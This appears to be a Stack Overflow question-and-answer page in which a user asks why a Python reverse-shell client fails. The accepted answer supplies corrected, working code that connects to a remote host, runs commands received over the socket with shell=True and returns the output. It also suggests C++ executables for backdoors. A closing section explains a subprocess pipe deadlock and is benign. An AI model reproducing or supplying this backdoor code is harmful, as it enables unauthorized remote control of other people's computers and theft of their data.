
/*

Hey, this script is purely for fun, not anything illegal; besides, it's easy to stop and detect. Furthermore, if I were to use it for illegal activities, why would I post it here?

*/

My problem is that I am not able to execute cmd commands from the client. I am not sure why, although I have a hint that it has to do with some kind of socket error. When I try to execute the command it just does nothing, no matter how long I wait. There's nothing wrong with the client, as I have tested it with a simpler version of the code below.

import getpass
import socket
import subprocess
username = getpass.getuser()
host = socket.gethostbyname('IP here')
port = 443
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
def start():
    conntrue = None
    while conntrue is None:
        try:
            conntrue = s.connect((host, port))
            s.send("[+] We are connected to %s") % (username)
            while True:
                try:
                    exec_code = s.recv(1024)
                    if exec_code == "quit":
                        break
                    elif exec_code == "Hey":
                        try:
                            proc = subprocess.Popen("MsgBox " + username + " Hey", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
                            stdout_value = proc.stdout.read() + proc.stderr.read()
                            s.send(stdout_value)
                        except:
                            s.send("[+] was wrong, just exec it manually")
                    else:
                        proc = subprocess.Popen(exec_code, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
                        stdout_value = proc.stdout.read() + proc.stderr.read()
                        s.send(stdout_value)
                except:
                    s.close()
        except:
            conntrue = None
            pass
    s.close()
start()
  • What does "not able to execute cmd commands from the client" mean? Why are you not able? Are you getting an error? Is it executing the wrong thing? Is the code crashing? – Bryan Oakley Oct 15 '15 at 11:41
  • unrelated: replace `stdout_value = proc.stdout.read() + proc.stderr.read()` with `output = b"".join(proc.communicate())` otherwise your child processes may hang if they expect input or if they generate enough output on stderr to fill the corresponding OS pipe buffer. – jfs Oct 15 '15 at 20:11
  • Your code is a nice illustration why you should not use a bare `except:` statement: it hides bugs in your code. Start by logging all exceptions that you get (and fixing corresponding bugs). – jfs Oct 15 '15 at 20:15
  • @J.F.Sebastian Thanks for that, used `except Exception, e` to find the mistake. I am not going to upload it in case someone uses this for anything illegal. – Oct 17 '15 at 23:19
  • also, if you do nothing with the subprocess output then you could redirect it to the socket directly: `Popen(..., stdout=s, stderr=STDOUT)`, [example](http://stackoverflow.com/questions/19961052/what-is-the-difference-if-i-dont-use-stdout-subprocess-pipe-in-subprocess-popen/19961290#comment29713500_19961290). – jfs Nov 01 '15 at 18:35

1 Answer

Here you go, this is working code to get a shell from your client. I doubt you will be able to use this for anything illegal anyway, python is not for backdoors. You should consider C++ for this kind of code, as not only is it fast but it can be compiled into an exe. Whereas python requires the python interpreter and therefore cannot run on Windows (unless you get py2exe).

import getpass
import socket
import subprocess
username = getpass.getuser()
host = socket.gethostbyname('')
port = 443
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection = None
while connection is None:
    try:
        connection = s.connect((host, port))
        s.send("[+] We are connected to %s" % username)
        while True:
            try:
                exec_code = s.recv(1024)
                if exec_code == "quit":
                    break
                else:
                    proc = subprocess.Popen(exec_code, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
                    stdout_value = proc.stdout.read() + proc.stderr.read()
                    s.send(stdout_value)
            except Exception, err:
                print err
    except Exception, e:
        print e
s.close()

Try not to use `except` by itself; use `except Exception, variable` to find mistakes in the code, then replace it with the bare `except`.

P.Andrews
  • -1, causes a deadlock if the program being run writes to stderr (and blocks for that write to complete) before it writes to stdout. – Charles Duffy Mar 18 '21 at 17:57
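The two comments above (jfs on the question, Charles Duffy on the answer) both point at the same subprocess pitfall: reading all of `stdout` and only then all of `stderr` deadlocks as soon as the child fills the stderr pipe buffer before it closes stdout, because the child blocks on its write while the parent blocks on its read. The following Python 3 example is added here to make that concrete; it is not code from the question or the answer, and it uses no socket. The child program is constructed for the demonstration (it floods stderr with 1 MiB, then writes to stdout); the function names `read_sequentially` and `read_with_communicate` and the watchdog thread are this example's own choices.

```python
"""Sequential pipe reads vs. communicate(): reproducing and avoiding the deadlock."""
import subprocess
import sys
import threading

# Constructed child program: writes 1 MiB to stderr (far more than any OS pipe
# buffer holds), then writes to stdout. It mirrors a command that is chatty on
# stderr before producing its real output.
CHILD = [
    sys.executable, "-c",
    "import sys; sys.stderr.buffer.write(b'e' * (1 << 20)); "
    "sys.stderr.flush(); sys.stdout.write('done'); sys.stdout.flush()",
]


def read_sequentially(argv, timeout=3.0):
    """The pattern from the page: proc.stdout.read() followed by proc.stderr.read().

    Returns (stdout, stderr, deadlocked). stdout.read() waits for EOF, which never
    comes while the child is stuck writing to a full stderr pipe. A watchdog
    thread is used here only so the demonstration terminates instead of hanging.
    """
    proc = subprocess.Popen(argv, stdin=subprocess.DEVNULL,
                            stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    result = {}

    def reader():
        result["out"] = proc.stdout.read()   # blocks until the child closes stdout
        result["err"] = proc.stderr.read()

    t = threading.Thread(target=reader, daemon=True)
    t.start()
    t.join(timeout)
    if t.is_alive():
        # Neither side can make progress: classic two-pipe deadlock. Kill the child
        # so its pipe ends close and the reader thread can finish.
        proc.kill()
        proc.wait()
        t.join(1)
        return result.get("out", b""), result.get("err", b""), True
    proc.wait()
    return result["out"], result["err"], False


def read_with_communicate(argv, timeout=30):
    """communicate() drains stdout and stderr concurrently, so the child can never
    block on either pipe; the timeout keeps a runaway child from hanging the caller."""
    proc = subprocess.Popen(argv, stdin=subprocess.DEVNULL,
                            stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    try:
        out, err = proc.communicate(timeout=timeout)
    except subprocess.TimeoutExpired:
        proc.kill()
        out, err = proc.communicate()
    return out, err, proc.returncode


if __name__ == "__main__":
    _, _, deadlocked = read_sequentially(CHILD)
    print("sequential reads deadlocked:", deadlocked)
    out, err, rc = read_with_communicate(CHILD)
    print("communicate(): rc=%d stdout=%r stderr=%d bytes" % (rc, out, len(err)))
```

The watchdog exists purely so the broken pattern can be shown without hanging the terminal; the fix itself is the second function, which is the `b"".join(proc.communicate())` suggestion from the comment with a timeout and a kill on expiry added. Passing the command as an argv list rather than a `shell=True` string also removes the shell from the picture, which is the other change a reviewer would ask for in the page's code.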